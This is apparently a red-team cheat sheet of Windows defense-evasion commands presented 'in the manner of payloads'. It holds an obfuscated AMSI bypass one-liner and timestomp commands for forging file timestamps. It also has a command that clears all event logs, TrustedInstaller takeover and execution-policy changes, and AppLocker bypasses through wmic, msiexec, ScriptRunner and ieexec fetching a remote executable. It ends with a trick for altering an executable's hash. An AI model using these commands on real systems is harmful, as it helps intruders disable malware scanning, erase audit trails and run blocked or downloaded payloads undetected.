Defense Evasion

In the manner of payloads, this section presents commands that worked at some point.

AMSI bypass (07/2020)

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

Timestomp

timestomp -z "06/13/1970 09:35:06" <p.exe>
timestomp -b <p.exe> 

Clear Windows event

The logs can be cleared if you have the right SE_SECURITY_NAME

Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }
eventvwr.msc

TrustedInstaller

https://www.tiraniddo.dev/2017/08/the-art-of-becoming-trustedinstaller.html

https://helpdeskgeek.com/windows-7/windows-7-how-to-delete-files-protected-by-trustedinstaller/

takeown.exe /F <executable.exe> /A
icacls.exe <executable.exe> /grant Administrators:f

Powershell restrictions

Set-ExecutionPolicy unrestricted -Scope CurrentUser
Get-ExecutionPolicy

C:\ blocked

\\127.0.0.1\c$

No cmd

forfiles /p c:\windows\system32 /m notepad.exe /c <malware.exe>
&{whoami}

AppLocker

Get-AppLockerPolicy -Effective -XML

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
doskey /exename=cmd.exe dir=<calc.exe>
dir
c:\efhekzfezh\LKHJKDZKJndzn\dezkhvk\..\..\..\windows\system32\cmd.exe
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e
ftp.exe
!cmd.exe
win+r 
wmic
process call create powershell.exe
OR wmic path win32_process call create powershell.exe
$C = [WmiClass] '/root/cimv2:Win32_Process'
$N = $C.derive('my_process')
$N.Put()
Invoke-WmiMethod my_process -Name CrEaTe -ArgumentList <cmd.exe>
msiexec.exe -Z <DLL>
msiexec.exe -Y <DLL> 
C:\Windows\System32\ScriptRunner.exe -appvscript powershell.exe
ieexec.exe <url/malware.exe>

Changing hash

copy /b <my_blocked_exe>+temp.txt out.exe